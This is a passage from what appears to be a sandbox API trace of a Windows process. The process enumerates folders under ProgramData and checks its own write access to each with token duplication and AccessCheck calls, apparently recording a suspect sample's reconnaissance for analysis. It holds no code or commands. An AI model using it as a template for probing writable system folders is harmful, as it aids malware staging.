AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.228] CloseHandle (hObject=0x32c) returned 1 [0106.228] CloseHandle (hObject=0x344) returned 1 [0106.229] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.229] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.229] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.229] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.229] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.229] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.229] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.229] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\WwanSvc\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.229] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\WwanSvc", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.229] GetLastError () returned 0x7a [0106.229] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\WwanSvc", RequestedInformation=0x7, pSecurityDescriptor=0x571700, nLength=0x8c, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571700, lpnLengthNeeded=0x281baf8) returned 1 [0106.229] GetLastError () returned 0x7a [0106.229] GetCurrentThread () returned 0xfffffffe [0106.229] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.229] GetCurrentProcess () returned 0xffffffff [0106.229] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.229] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.229] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.229] AccessCheck (in: pSecurityDescriptor=0x571700, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.229] CloseHandle (hObject=0x344) returned 1 [0106.229] CloseHandle (hObject=0x33c) returned 1 [0106.229] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.230] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.230] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.230] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\WwanSvc\\Profiles", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.230] GetLastError () returned 0x7a [0106.230] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\WwanSvc\\Profiles", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0x144, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281b560) returned 1 [0106.230] GetLastError () returned 0x7a [0106.230] GetCurrentThread () returned 0xfffffffe [0106.230] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.230] GetCurrentProcess () returned 0xffffffff [0106.230] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.230] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.230] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.230] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.230] CloseHandle (hObject=0x32c) returned 1 [0106.230] CloseHandle (hObject=0x344) returned 1 [0106.230] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.230] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.230] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.230] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.230] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.230] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0 [0106.230] FindClose (in: hFindFile=0x5fc2d8 | out: hFindFile=0x5fc2d8) returned 1 [0106.230] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.231] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft OneDrive\\*", lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0x5fc2d8 [0106.231] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft OneDrive", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281c090) returned 0 [0106.231] GetLastError () returned 0x7a [0106.231] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft OneDrive", RequestedInformation=0x7, pSecurityDescriptor=0x571700, nLength=0xb8, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x571700, lpnLengthNeeded=0x281c090) returned 1 [0106.231] GetLastError () returned 0x7a [0106.231] GetCurrentThread () returned 0xfffffffe [0106.231] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x0) returned 0 [0106.231] GetCurrentProcess () returned 0xffffffff [0106.231] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x334) returned 1 [0106.231] DuplicateToken (in: ExistingTokenHandle=0x334, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281c094 | out: DuplicateTokenHandle=0x281c094*=0x33c) returned 1 [0106.231] MapGenericMask (in: AccessMask=0x281c0a4, GenericMapping=0x281c074 | out: AccessMask=0x281c0a4) [0106.231] AccessCheck (in: pSecurityDescriptor=0x571700, ClientToken=0x33c, DesiredAccess=0x120116, GenericMapping=0x281c074, PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c | out: PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c) returned 1 [0106.231] CloseHandle (hObject=0x33c) returned 1 [0106.231] CloseHandle (hObject=0x334) returned 1 [0106.232] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.232] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.232] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft OneDrive\\setup\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.232] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft OneDrive\\setup", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.232] GetLastError () returned 0x7a [0106.232] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft OneDrive\\setup", RequestedInformation=0x7, pSecurityDescriptor=0x571700, nLength=0xb8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571700, lpnLengthNeeded=0x281baf8) returned 1 [0106.232] GetLastError () returned 0x7a [0106.232] GetCurrentThread () returned 0xfffffffe [0106.232] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.232] GetCurrentProcess () returned 0xffffffff [0106.232] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.232] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.232] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.232] AccessCheck (in: pSecurityDescriptor=0x571700, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.232] CloseHandle (hObject=0x344) returned 1 [0106.232] CloseHandle (hObject=0x33c) returned 1 [0106.232] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.235] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.235] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.235] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0 [0106.235] FindClose (in: hFindFile=0x5fc2d8 | out: hFindFile=0x5fc2d8) returned 1 [0106.235] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.235] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Mozilla\\*", lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0x5fc2d8 [0106.236] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Mozilla", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281c090) returned 0 [0106.236] GetLastError () returned 0x7a [0106.236] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Mozilla", RequestedInformation=0x7, pSecurityDescriptor=0x571700, nLength=0xb8, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x571700, lpnLengthNeeded=0x281c090) returned 1 [0106.236] GetLastError () returned 0x7a [0106.236] GetCurrentThread () returned 0xfffffffe [0106.236] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x0) returned 0 [0106.236] GetCurrentProcess () returned 0xffffffff [0106.236] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x334) returned 1 [0106.236] DuplicateToken (in: ExistingTokenHandle=0x334, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281c094 | out: DuplicateTokenHandle=0x281c094*=0x33c) returned 1 [0106.236] MapGenericMask (in: AccessMask=0x281c0a4, GenericMapping=0x281c074 | out: AccessMask=0x281c0a4) [0106.236] AccessCheck (in: pSecurityDescriptor=0x571700, ClientToken=0x33c, DesiredAccess=0x120116, GenericMapping=0x281c074, PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c | out: PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c) returned 1 [0106.236] CloseHandle (hObject=0x33c) returned 1 [0106.236] CloseHandle (hObject=0x334) returned 1 [0106.236] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.236] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.236] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Mozilla\\logs\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.236] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Mozilla\\logs", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.236] GetLastError () returned 0x7a [0106.236] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Mozilla\\logs", RequestedInformation=0x7, pSecurityDescriptor=0x572758, nLength=0xb8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572758, lpnLengthNeeded=0x281baf8) returned 1 [0106.237] GetLastError () returned 0x7a [0106.237] GetCurrentThread () returned 0xfffffffe [0106.237] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.237] GetCurrentProcess () returned 0xffffffff [0106.237] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.237] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.237] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.237] AccessCheck (in: pSecurityDescriptor=0x572758, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.237] CloseHandle (hObject=0x344) returned 1 [0106.237] CloseHandle (hObject=0x33c) returned 1 [0106.237] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.237] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.237] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.237] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.237] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0 [0106.237] FindClose (in: hFindFile=0x5fc2d8 | out: hFindFile=0x5fc2d8) returned 1 [0106.237] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.237] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Oracle\\*", lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0x5fc2d8 [0106.238] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Oracle", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281c090) returned 0 [0106.238] GetLastError () returned 0x7a [0106.238] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Oracle", RequestedInformation=0x7, pSecurityDescriptor=0x5727e0, nLength=0xb8, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x5727e0, lpnLengthNeeded=0x281c090) returned 1 [0106.238] GetLastError () returned 0x7a [0106.238] GetCurrentThread () returned 0xfffffffe [0106.238] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x0) returned 0 [0106.238] GetCurrentProcess () returned 0xffffffff [0106.238] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x334) returned 1 [0106.238] DuplicateToken (in: ExistingTokenHandle=0x334, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281c094 | out: DuplicateTokenHandle=0x281c094*=0x33c) returned 1 [0106.238] MapGenericMask (in: AccessMask=0x281c0a4, GenericMapping=0x281c074 | out: AccessMask=0x281c0a4) [0106.238] AccessCheck (in: pSecurityDescriptor=0x5727e0, ClientToken=0x33c, DesiredAccess=0x120116, GenericMapping=0x281c074, PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c | out: PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c) returned 1 [0106.238] CloseHandle (hObject=0x33c) returned 1 [0106.238] CloseHandle (hObject=0x334) returned 1 [0106.238] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.238] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0 [0106.238] FindClose (in: hFindFile=0x5fc2d8 | out: hFindFile=0x5fc2d8) returned 1 [0106.238] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.238] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\*", lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0x5fc2d8 [0106.239] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281c090) returned 0 [0106.239] GetLastError () returned 0x7a [0106.239] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache", RequestedInformation=0x7, pSecurityDescriptor=0x5727e0, nLength=0xcc, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x5727e0, lpnLengthNeeded=0x281c090) returned 1 [0106.239] GetLastError () returned 0x7a [0106.239] GetCurrentThread () returned 0xfffffffe [0106.239] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x0) returned 0 [0106.239] GetCurrentProcess () returned 0xffffffff [0106.239] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x334) returned 1 [0106.239] DuplicateToken (in: ExistingTokenHandle=0x334, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281c094 | out: DuplicateTokenHandle=0x281c094*=0x33c) returned 1 [0106.239] MapGenericMask (in: AccessMask=0x281c0a4, GenericMapping=0x281c074 | out: AccessMask=0x281c0a4) [0106.239] AccessCheck (in: pSecurityDescriptor=0x5727e0, ClientToken=0x33c, DesiredAccess=0x120116, GenericMapping=0x281c074, PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c | out: PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c) returned 1 [0106.239] CloseHandle (hObject=0x33c) returned 1 [0106.239] CloseHandle (hObject=0x334) returned 1 [0106.239] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.239] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.239] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.239] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.239] GetLastError () returned 0x7a [0106.239] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.240] GetLastError () returned 0x7a [0106.240] GetCurrentThread () returned 0xfffffffe [0106.240] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.240] GetCurrentProcess () returned 0xffffffff [0106.240] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.240] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.240] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.240] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.240] CloseHandle (hObject=0x344) returned 1 [0106.240] CloseHandle (hObject=0x33c) returned 1 [0106.240] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.240] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.240] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.240] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.240] GetLastError () returned 0x7a [0106.240] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x57e730, nLength=0xcc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x57e730, lpnLengthNeeded=0x281b560) returned 1 [0106.241] GetLastError () returned 0x7a [0106.241] GetCurrentThread () returned 0xfffffffe [0106.241] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.241] GetCurrentProcess () returned 0xffffffff [0106.241] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.241] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.241] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.241] AccessCheck (in: pSecurityDescriptor=0x57e730, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.241] CloseHandle (hObject=0x32c) returned 1 [0106.241] CloseHandle (hObject=0x344) returned 1 [0106.241] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.241] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.241] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.241] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.241] GetLastError () returned 0x7a [0106.241] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", RequestedInformation=0x7, pSecurityDescriptor=0x28a6518, nLength=0xcc, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x28a6518, lpnLengthNeeded=0x281afc8) returned 1 [0106.241] GetLastError () returned 0x7a [0106.241] GetCurrentThread () returned 0xfffffffe [0106.241] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.241] GetCurrentProcess () returned 0xffffffff [0106.241] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.241] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.241] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.241] AccessCheck (in: pSecurityDescriptor=0x28a6518, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.241] CloseHandle (hObject=0x340) returned 1 [0106.241] CloseHandle (hObject=0x32c) returned 1 [0106.242] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.242] FindNextFileW (in: hFindFile=0x5fc1d8, 